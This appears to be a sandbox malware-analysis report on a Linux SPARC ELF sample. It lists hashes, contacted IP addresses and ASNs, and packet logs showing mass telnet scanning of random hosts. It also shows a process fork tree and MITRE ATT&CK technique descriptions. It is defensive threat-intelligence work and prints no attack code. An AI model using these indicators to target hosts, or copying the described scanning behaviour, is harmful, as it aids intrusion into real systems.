185.244.103.40	unknown	Estonia	202635	SERVERFARMEE	false
91.179.103.166	unknown	Belgium	5432	PROXIMUS-ISP-ASBE	false
34.181.181.15	unknown	United States	2686	ATGS-MMD-ASUS	false
185.156.114.155	unknown	Norway	8896	XFIBER-ASNO	false
185.50.154.141	unknown	United Kingdom	50203	UK-REYNOLDS-ASNGB	false
45.130.62.156	unknown	Israel	60781	LEASEWEB-NL-AMS-01NetherlandsNL	false
185.69.33.50	unknown	Netherlands	196826	PL-NETTELEKOM-ASNPL	false
197.114.121.159	unknown	Algeria	36947	ALGTEL-ASDZ	false
185.132.166.208	unknown	Spain	29119	SERVIHOSTING-ASAireNetworksES	false
91.26.178.54	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
211.176.210.238	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
91.199.162.51	unknown	Germany	42652	DELUNETDE	false
185.50.154.135	unknown	United Kingdom	50203	UK-REYNOLDS-ASNGB	false
91.197.220.6	unknown	Ukraine	3326	DATAGROUPDatagroupPJSCUA	false
147.89.189.214	unknown	United Kingdom	559	SWITCHPeeringrequestspeeringswitchchEU	false
119.29.176.65	unknown	China	45090	CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa	false
185.102.172.184	unknown	Netherlands	7922	COMCAST-7922US	false
197.43.51.137	unknown	Egypt	8452	TE-ASTE-ASEG	false
41.157.30.75	unknown	South Africa	37168	CELL-CZA	false
185.203.160.82	unknown	Iran (ISLAMIC Republic Of)	205837	SADADPSP-ASSadadProcessingModernServicesCompanyPJS	false
45.205.88.132	unknown	Seychelles	54600	PEGTECHINCUS	false
51.174.247.85	unknown	Norway	29695	ALTIBOX_ASNorwayNO	false
185.19.109.135	unknown	United Kingdom	17804	LAODC-AS-APLaoDataCenterLA	false
41.219.191.22	unknown	Nigeria	30998	NAL-ASNG	false
216.221.74.30	unknown	Canada	7992	COGECOWAVECA	false
45.205.88.137	unknown	Seychelles	54600	PEGTECHINCUS	false
91.90.227.103	unknown	Latvia	24589	TELENETSIA-ASTelenetAUT-NUMpeeringspecificationobject	false
209.62.244.171	unknown	United States	32719	BEPC-ASUS	false
49.192.247.41	unknown	Australia	4804	MPX-ASMicroplexPTYLTDAU	false
153.239.66.151	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
185.91.208.152	unknown	Azerbaijan	198193	ASN-TCABLEES	false
91.191.194.2	unknown	Azerbaijan	41997	CONNECT-AS-1AZ	false
155.183.159.155	unknown	United States	37532	ZAMRENZM	false
185.199.120.237	unknown	Serbia	42603	PARKING-SERVIS-ASRS	false
45.11.15.113	unknown	Netherlands	395800	GBTCLOUDUS	false
185.75.12.239	unknown	Spain	201942	SOLTIAES	false
185.222.2.236	unknown	Austria	206091	PLANET-DIGITALAT	false
185.56.176.218	unknown	France	35600	ASN-VEDEGEFR	false
156.223.50.219	unknown	Egypt	8452	TE-ASTE-ASEG	false
91.123.112.1	unknown	France	8302	ZATTOOZuerichSwitzerlandCH	false
91.190.247.32	unknown	Germany	42311	PGHOSTING-DRESDENPGHOSTING-DRESDEN-BACKBONEDE	false
139.120.194.75	unknown	Norway	5619	EVRY-NO	false
185.226.106.149	unknown	Spain	207046	REDSERVICIOES	false
41.21.227.79	unknown	South Africa	36994	Vodacom-VBZA	false
45.167.243.35	unknown	Brazil	268058	REDEMETROPOLITANADETELECOMUNICACOESLTDA-MEBR	false
91.128.130.6	unknown	Austria	1257	TELE2EU	false
54.98.64.93	unknown	United States	16509	AMAZON-02US	false
45.202.220.198	unknown	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
45.202.220.199	unknown	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
45.104.148.75	unknown	Egypt	37069	MOBINILEG	false
185.37.230.227	unknown	Spain	60458	ASN-XTUDIONETES	false
79.112.6.241	unknown	Romania	8708	RCS-RDS73-75DrStaicoviciRO	false
185.50.154.121	unknown	United Kingdom	50203	UK-REYNOLDS-ASNGB	false
91.74.182.143	unknown	United Arab Emirates	15802	DU-AS1AE	false
185.38.220.194	unknown	Poland	56523	AMELEKTRONIKPL	false
91.112.149.164	unknown	Austria	8447	TELEKOM-ATA1TelekomAustriaAGAT	false
223.95.198.29	unknown	China	56041	CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationC	false
185.244.103.203	unknown	Estonia	202635	SERVERFARMEE	false
69.13.247.219	unknown	United States	54489	CORESPACE-DALUS	false
174.100.121.140	unknown	United States	10796	TWC-10796-MIDWESTUS	false
188.245.52.93	unknown	Iran (ISLAMIC Republic Of)	16322	PARSONLINETehran-IRANIR	false

Runtime Messages

Command:	/tmp/BitmCvTrdO
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	C7C - c
Standard Error:

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
45.150.101.140	Hilix.x86	Get hash	malicious	Browse
197.166.142.80	RiPy3zOdjl	Get hash	malicious	Browse
45.109.110.157	i01hLg63ev	Get hash	malicious	Browse
185.19.109.165	BcOfN2cD3e	Get hash	malicious	Browse
41.44.233.246	x86	Get hash	malicious	Browse
185.149.161.25	93T511Z3h8	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ACORSOFR	apep.x86	Get hash	malicious	Browse	45.12.189.188
	SCahhGpqlT	Get hash	malicious	Browse	45.12.189.155
	dBmJXcsqS4	Get hash	malicious	Browse	45.12.189.150
	aFxrnP3GU4	Get hash	malicious	Browse	45.12.189.145
	Hilix.x86	Get hash	malicious	Browse	45.12.189.13
	Hilix.x86	Get hash	malicious	Browse	45.12.189.22
	3MlwPT62vR	Get hash	malicious	Browse	45.12.189.131
	Antisocial.x86	Get hash	malicious	Browse	45.12.189.12
	Antisocial.arm	Get hash	malicious	Browse	45.12.189.11
	0iojYwstAE	Get hash	malicious	Browse	45.12.189.138
	NMlnVly7uv	Get hash	malicious	Browse	45.12.189.139
	bPAMfuy9oa	Get hash	malicious	Browse	45.12.189.156
	Md3k7pepaq	Get hash	malicious	Browse	45.12.189.134
LOVESERVERSGB	OhUy3woBmb	Get hash	malicious	Browse	45.150.101.139
	PO88736446.exe	Get hash	malicious	Browse	203.159.80.151
	PO99817581.exe	Get hash	malicious	Browse	203.159.80.151
	sora.x86	Get hash	malicious	Browse	45.150.101.135
	dTmYFku6X8	Get hash	malicious	Browse	45.150.101.191
	tI0W00k1vt	Get hash	malicious	Browse	45.150.101.197
	Hilix.arm7	Get hash	malicious	Browse	45.150.101.170
	Hilix.x86	Get hash	malicious	Browse	45.150.101.174
	Hilix.arm7	Get hash	malicious	Browse	45.150.101.196
	Antisocial.x86	Get hash	malicious	Browse	45.150.101.165
	frosty.x86	Get hash	malicious	Browse	45.150.101.165
	zd9Gd8UT5s	Get hash	malicious	Browse	45.150.101.170
	Qz1DSFEgD9.exe	Get hash	malicious	Browse	203.159.80.52
	mg2m6hZU0W.exe	Get hash	malicious	Browse	203.159.80.18
	p7qsMlfWjt.exe	Get hash	malicious	Browse	203.159.80.18
	inquire details & specification.exe	Get hash	malicious	Browse	203.159.80.52
	NMlnVly7uv	Get hash	malicious	Browse	45.150.101.161
	dark.86_64	Get hash	malicious	Browse	45.150.101.150
	PO17904.doc	Get hash	malicious	Browse	203.159.80.186
	18.08.2021 Purchase Order.doc	Get hash	malicious	Browse	203.159.80.186
AFRARASAIR	17Rom1F3MY	Get hash	malicious	Browse	185.49.104.8
	Yx8iF6YZtN	Get hash	malicious	Browse	185.49.104.3
	SecuriteInfo.com.Exploit.Siggen3.10048.24657.xls	Get hash	malicious	Browse	185.118.15.137
	SecuriteInfo.com.Exploit.Siggen3.10048.14515.xls	Get hash	malicious	Browse	185.118.15.137

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.104929349861386
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	BitmCvTrdO
File size:	69072
MD5:	83f51eab5d7a35965c15c15a0966ccc8
SHA1:	3fa59c483662eff85b5b454692eb3dbaa76944ed
SHA256:	9ae7441ecbce9ecf93e8825a4a98b04ec55388a614cbae4baaf8f5e037ee8a76
SHA512:	296eff1fb30310c2ab96631b5dfb20bff582c98d57d4752d98c7a1a397aab77b4f20f97a260223d00988666315238f605ee49df1b4785003c7cc2eb651455162
SSDEEP:	1536:b+lhwhYS5Gbb4O9jtuMzdH9qoKb284k3astY847l:b2eI4wztOi5kK9l
File Content Preview:	.ELF...........................4...@.....4. ...(.......................................................l..&d........dt.Q................................@..(....@.9w................#.....`...`.....!..... ...@.....".........`......$ ... ...@...........`....

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	Sparc
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x101a4
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	68672
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x10094	0x94	0x1c	0x0	0x6	AX	4
.text	PROGBITS	0x100b0	0xb0	0xe614	0x0	0x6	AX	4
.fini	PROGBITS	0x1e6c4	0xe6c4	0x14	0x0	0x6	AX	4
.rodata	PROGBITS	0x1e6d8	0xe6d8	0x21b8	0x0	0x2	A	8
.ctors	PROGBITS	0x30894	0x10894	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x3089c	0x1089c	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x308a8	0x108a8	0x358	0x0	0x3	WA	8
.bss	NOBITS	0x30c00	0x10c00	0x22f8	0x0	0x3	WA	8
.shstrtab	STRTAB	0x0	0x10c00	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x10000	0x10000	0x10890	0x10890	3.7025	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x10894	0x30894	0x30894	0x36c	0x2664	1.6618	0x6	RW	0x10000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2021 10:32:07.168597937 CET	42836	443	192.168.2.23	91.189.91.43
Nov 1, 2021 10:32:07.672894001 CET	23	48144	95.244.211.33	192.168.2.23
Nov 1, 2021 10:32:07.672975063 CET	48144	23	192.168.2.23	95.244.211.33
Nov 1, 2021 10:32:07.673423052 CET	23	48144	95.244.211.33	192.168.2.23
Nov 1, 2021 10:32:07.673465014 CET	48144	23	192.168.2.23	95.244.211.33
Nov 1, 2021 10:32:07.680552006 CET	42516	80	192.168.2.23	109.202.202.202
Nov 1, 2021 10:32:07.773299932 CET	39969	23	192.168.2.23	148.24.242.140
Nov 1, 2021 10:32:07.773370028 CET	39969	23	192.168.2.23	165.21.219.131
Nov 1, 2021 10:32:07.773374081 CET	39969	23	192.168.2.23	82.97.109.140
Nov 1, 2021 10:32:07.773422003 CET	39969	23	192.168.2.23	157.190.18.42
Nov 1, 2021 10:32:07.773423910 CET	39969	23	192.168.2.23	152.113.110.65
Nov 1, 2021 10:32:07.773433924 CET	39969	23	192.168.2.23	108.90.152.125
Nov 1, 2021 10:32:07.773437977 CET	39969	23	192.168.2.23	211.46.144.5
Nov 1, 2021 10:32:07.773442984 CET	39969	23	192.168.2.23	121.117.93.163
Nov 1, 2021 10:32:07.773447037 CET	39969	23	192.168.2.23	48.49.253.63
Nov 1, 2021 10:32:07.773456097 CET	39969	23	192.168.2.23	71.10.224.151
Nov 1, 2021 10:32:07.773458004 CET	39969	23	192.168.2.23	57.161.224.218
Nov 1, 2021 10:32:07.773458004 CET	39969	23	192.168.2.23	41.214.15.64
Nov 1, 2021 10:32:07.773463964 CET	39969	23	192.168.2.23	1.240.179.83
Nov 1, 2021 10:32:07.773469925 CET	39969	23	192.168.2.23	174.25.12.89
Nov 1, 2021 10:32:07.773473978 CET	39969	23	192.168.2.23	221.127.163.114
Nov 1, 2021 10:32:07.773479939 CET	39969	23	192.168.2.23	87.22.230.143
Nov 1, 2021 10:32:07.773492098 CET	39969	23	192.168.2.23	151.133.209.114
Nov 1, 2021 10:32:07.773502111 CET	39969	23	192.168.2.23	102.182.198.178
Nov 1, 2021 10:32:07.773509026 CET	39969	23	192.168.2.23	190.162.241.27
Nov 1, 2021 10:32:07.773518085 CET	39969	23	192.168.2.23	191.150.162.210
Nov 1, 2021 10:32:07.773525000 CET	39969	23	192.168.2.23	145.5.254.50
Nov 1, 2021 10:32:07.773536921 CET	39969	23	192.168.2.23	9.88.156.174
Nov 1, 2021 10:32:07.773540020 CET	39969	23	192.168.2.23	130.87.134.157
Nov 1, 2021 10:32:07.773566961 CET	39969	23	192.168.2.23	169.201.165.160
Nov 1, 2021 10:32:07.773570061 CET	39969	23	192.168.2.23	67.243.203.64
Nov 1, 2021 10:32:07.773571014 CET	39969	23	192.168.2.23	143.179.190.137
Nov 1, 2021 10:32:07.773572922 CET	39969	23	192.168.2.23	205.73.167.17
Nov 1, 2021 10:32:07.773586035 CET	39969	23	192.168.2.23	71.90.1.54
Nov 1, 2021 10:32:07.773587942 CET	39969	23	192.168.2.23	42.76.89.20
Nov 1, 2021 10:32:07.773588896 CET	39969	23	192.168.2.23	82.62.162.189
Nov 1, 2021 10:32:07.773593903 CET	39969	23	192.168.2.23	62.41.141.92
Nov 1, 2021 10:32:07.773610115 CET	39969	23	192.168.2.23	168.54.23.110
Nov 1, 2021 10:32:07.773610115 CET	39969	23	192.168.2.23	216.151.161.28
Nov 1, 2021 10:32:07.773612022 CET	39969	23	192.168.2.23	206.38.85.54
Nov 1, 2021 10:32:07.773612022 CET	39969	23	192.168.2.23	85.109.52.252
Nov 1, 2021 10:32:07.773624897 CET	39969	23	192.168.2.23	12.245.200.60
Nov 1, 2021 10:32:07.773626089 CET	39969	23	192.168.2.23	218.111.72.101
Nov 1, 2021 10:32:07.773627996 CET	39969	23	192.168.2.23	118.2.167.65
Nov 1, 2021 10:32:07.773632050 CET	39969	23	192.168.2.23	216.132.98.66
Nov 1, 2021 10:32:07.773633957 CET	39969	23	192.168.2.23	183.210.12.107
Nov 1, 2021 10:32:07.773643970 CET	39969	23	192.168.2.23	73.36.121.247
Nov 1, 2021 10:32:07.773647070 CET	39969	23	192.168.2.23	194.200.77.126
Nov 1, 2021 10:32:07.773657084 CET	39969	23	192.168.2.23	32.15.235.132
Nov 1, 2021 10:32:07.773660898 CET	39969	23	192.168.2.23	143.194.6.66
Nov 1, 2021 10:32:07.773664951 CET	39969	23	192.168.2.23	169.85.159.201
Nov 1, 2021 10:32:07.773668051 CET	39969	23	192.168.2.23	153.112.79.126
Nov 1, 2021 10:32:07.773674965 CET	39969	23	192.168.2.23	66.1.152.161
Nov 1, 2021 10:32:07.773678064 CET	39969	23	192.168.2.23	124.130.35.129
Nov 1, 2021 10:32:07.773679972 CET	39969	23	192.168.2.23	133.41.168.210
Nov 1, 2021 10:32:07.773689985 CET	39969	23	192.168.2.23	199.234.232.240
Nov 1, 2021 10:32:07.773694038 CET	39969	23	192.168.2.23	205.137.29.164
Nov 1, 2021 10:32:07.773695946 CET	39969	23	192.168.2.23	164.213.158.107
Nov 1, 2021 10:32:07.773709059 CET	39969	23	192.168.2.23	125.67.173.68
Nov 1, 2021 10:32:07.773710966 CET	39969	23	192.168.2.23	137.34.138.0
Nov 1, 2021 10:32:07.773720026 CET	39969	23	192.168.2.23	111.159.228.50
Nov 1, 2021 10:32:07.773730993 CET	39969	23	192.168.2.23	210.225.173.215
Nov 1, 2021 10:32:07.773732901 CET	39969	23	192.168.2.23	197.128.117.151
Nov 1, 2021 10:32:07.773734093 CET	39969	23	192.168.2.23	205.245.184.212
Nov 1, 2021 10:32:07.773735046 CET	39969	23	192.168.2.23	191.248.74.30
Nov 1, 2021 10:32:07.773735046 CET	39969	23	192.168.2.23	164.85.70.7
Nov 1, 2021 10:32:07.773741961 CET	39969	23	192.168.2.23	222.162.112.83
Nov 1, 2021 10:32:07.773747921 CET	39969	23	192.168.2.23	213.76.135.135
Nov 1, 2021 10:32:07.773753881 CET	39969	23	192.168.2.23	147.138.86.122
Nov 1, 2021 10:32:07.773756027 CET	39969	23	192.168.2.23	161.111.116.253
Nov 1, 2021 10:32:07.773756027 CET	39969	23	192.168.2.23	210.11.159.85
Nov 1, 2021 10:32:07.773758888 CET	39969	23	192.168.2.23	189.79.71.74
Nov 1, 2021 10:32:07.773766041 CET	39969	23	192.168.2.23	32.109.128.194
Nov 1, 2021 10:32:07.773773909 CET	39969	23	192.168.2.23	138.238.151.122
Nov 1, 2021 10:32:07.773773909 CET	39969	23	192.168.2.23	41.147.57.175
Nov 1, 2021 10:32:07.773775101 CET	39969	23	192.168.2.23	23.34.94.145
Nov 1, 2021 10:32:07.773788929 CET	39969	23	192.168.2.23	172.11.190.94
Nov 1, 2021 10:32:07.773792982 CET	39969	23	192.168.2.23	131.93.178.160
Nov 1, 2021 10:32:07.773793936 CET	39969	23	192.168.2.23	154.230.76.239
Nov 1, 2021 10:32:07.773806095 CET	39969	23	192.168.2.23	4.88.165.22
Nov 1, 2021 10:32:07.773809910 CET	39969	23	192.168.2.23	36.240.59.214
Nov 1, 2021 10:32:07.773813009 CET	39969	23	192.168.2.23	204.134.211.56
Nov 1, 2021 10:32:07.773830891 CET	39969	23	192.168.2.23	162.208.140.67
Nov 1, 2021 10:32:07.773830891 CET	39969	23	192.168.2.23	139.56.240.153
Nov 1, 2021 10:32:07.773833036 CET	39969	23	192.168.2.23	206.22.64.190
Nov 1, 2021 10:32:07.773847103 CET	39969	23	192.168.2.23	212.134.137.34
Nov 1, 2021 10:32:07.773848057 CET	39969	23	192.168.2.23	210.221.154.222
Nov 1, 2021 10:32:07.773850918 CET	39969	23	192.168.2.23	129.102.237.18
Nov 1, 2021 10:32:07.773858070 CET	39969	23	192.168.2.23	159.28.115.253
Nov 1, 2021 10:32:07.773858070 CET	39969	23	192.168.2.23	172.196.224.243
Nov 1, 2021 10:32:07.773864985 CET	39969	23	192.168.2.23	173.66.243.143
Nov 1, 2021 10:32:07.773864985 CET	39969	23	192.168.2.23	132.162.229.125
Nov 1, 2021 10:32:07.773866892 CET	39969	23	192.168.2.23	177.179.61.128
Nov 1, 2021 10:32:07.773874998 CET	39969	23	192.168.2.23	71.196.215.223
Nov 1, 2021 10:32:07.773879051 CET	39969	23	192.168.2.23	50.157.246.35
Nov 1, 2021 10:32:07.773885012 CET	39969	23	192.168.2.23	205.72.35.164
Nov 1, 2021 10:32:07.773885965 CET	39969	23	192.168.2.23	152.102.218.157
Nov 1, 2021 10:32:07.773943901 CET	39969	23	192.168.2.23	18.232.47.1
Nov 1, 2021 10:32:07.773945093 CET	39969	23	192.168.2.23	85.79.86.241
Nov 1, 2021 10:32:07.773955107 CET	39969	23	192.168.2.23	135.131.70.32

HTTP Request Dependency Graph

127.0.0.1:52869

System Behavior

Analysis Process: BitmCvTrdO PID: 5233 Parent PID: 5112

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	/tmp/BitmCvTrdO
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5235 Parent PID: 5233

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5240 Parent PID: 5235

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5241 Parent PID: 5235

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5246 Parent PID: 5241

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5268 Parent PID: 5246

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5271 Parent PID: 5246

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5272 Parent PID: 5246

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5273 Parent PID: 5246

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5256 Parent PID: 5241

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5269 Parent PID: 5241

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5278 Parent PID: 5241

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5280 Parent PID: 5241

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5236 Parent PID: 5233

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5237 Parent PID: 5233

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5244 Parent PID: 5237

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5260 Parent PID: 5244

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5261 Parent PID: 5244

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5262 Parent PID: 5244

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5264 Parent PID: 5244

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5247 Parent PID: 5237

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5248 Parent PID: 5237

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5251 Parent PID: 5237

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: BitmCvTrdO PID: 5257 Parent PID: 5237

General

Start time:	10:32:06
Start date:	01/11/2021
Path:	/tmp/BitmCvTrdO
Arguments:	n/a
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report BitmCvTrdO

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Jbx Signature Overview

AV Detection:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

System Behavior

Analysis Process: BitmCvTrdO PID: 5233 Parent PID: 5112

General

Analysis Process: BitmCvTrdO PID: 5235 Parent PID: 5233

General

Analysis Process: BitmCvTrdO PID: 5240 Parent PID: 5235

General

Analysis Process: BitmCvTrdO PID: 5241 Parent PID: 5235

General

Analysis Process: BitmCvTrdO PID: 5246 Parent PID: 5241

General

Analysis Process: BitmCvTrdO PID: 5268 Parent PID: 5246

General

Analysis Process: BitmCvTrdO PID: 5271 Parent PID: 5246

General

Analysis Process: BitmCvTrdO PID: 5272 Parent PID: 5246

General

Analysis Process: BitmCvTrdO PID: 5273 Parent PID: 5246

General

Analysis Process: BitmCvTrdO PID: 5256 Parent PID: 5241